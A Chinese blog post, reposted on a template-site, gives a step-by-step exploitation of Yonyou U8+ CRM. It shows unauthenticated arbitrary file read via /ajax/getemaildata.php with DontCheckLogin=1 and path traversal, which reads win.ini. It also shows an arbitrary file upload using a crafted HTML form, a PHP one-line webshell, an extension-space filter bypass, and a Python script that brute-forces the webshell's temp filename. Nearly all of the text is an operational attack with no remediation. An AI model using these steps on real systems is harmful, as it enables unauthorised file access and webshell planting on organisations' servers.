用友U8+ CRM任意文件上传、任意文件读取实战-Toy模板网

这篇具有很好参考价值的文章主要介绍了用友U8+ CRM任意文件上传、任意文件读取实战。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

用友CRM系统，使用量非常广,这里存在任意文件读取漏洞、任意文件上传漏洞

用友任意文件读取,php,服务器,开发语言,安全,网络安全

任意文件读取

存在漏洞的文件为：

/ajax/getemaildata.php

访问http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1&filePath=../version.txt

可以看到用友版本7.2 patch2

访问http://IP:端口/ajax/getemaildata.php?DontCheckLogin=1&filePath=c:/windows/win.ini

可以看到C://windows/win.ini

用友任意文件读取,php,服务器,开发语言,安全,网络安全

任意文件上传

首先构造一个文件上传的页面

<html>

<form action="http://IP:端口//ajax/getemaildata.php?DontCheckLogin=1" method="post" enctype ="multipart/form-data"> 

  <input type="file" name="file" /> 

  <input type="submit" name="upload" value="upload"/>

</form>

</html>

选择php一句话木马

用友任意文件读取,php,服务器,开发语言,安全,网络安全

打开burp进行抓包，在文件上传的后缀名处添加一个空格

用友任意文件读取,php,服务器,开发语言,安全,网络安全

返回的tmpfile\\mht3AC8.tmp.mht即为木马地址，访问http://IP:端口/tmpfile//mht3AC8.tmp.mht即可看到未解析的马。木马的位置为tmpfile/upd****.tmp.php，将前面的mht改为upd，将后面的mht改为php

用友任意文件读取,php,服务器,开发语言,安全,网络安全

抓包，将其放到爆破工具里，爆破中间的3AC8，范围是从0000~FFFF，共65536个

用友任意文件读取,php,服务器,开发语言,安全,网络安全

生成字典的脚本如下：

with open('1.txt', 'w') as f:
    for i in range(0x10000):
        f.write(format(i, '04X') + '\n')

该脚本会在当前目录下生成1.txt

用友任意文件读取,php,服务器,开发语言,安全,网络安全

成功访问到马

用友任意文件读取,php,服务器,开发语言,安全,网络安全文章来源地址https://www.toymoban.com/news/detail-525767.html

到了这里，关于用友U8+ CRM任意文件上传、任意文件读取实战的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

用友U8+ CRM任意文件上传、任意文件读取实战

任意文件读取

任意文件上传

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

支付宝扫一扫领取红包，优惠每天领

二维码1

二维码2

用友U8+ CRM任意文件上传、任意文件读取 实战

任意文件读取

任意文件上传

相关文章

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏

支付宝扫一扫领取红包，优惠每天领

二维码1

二维码2

用友U8+ CRM任意文件上传、任意文件读取实战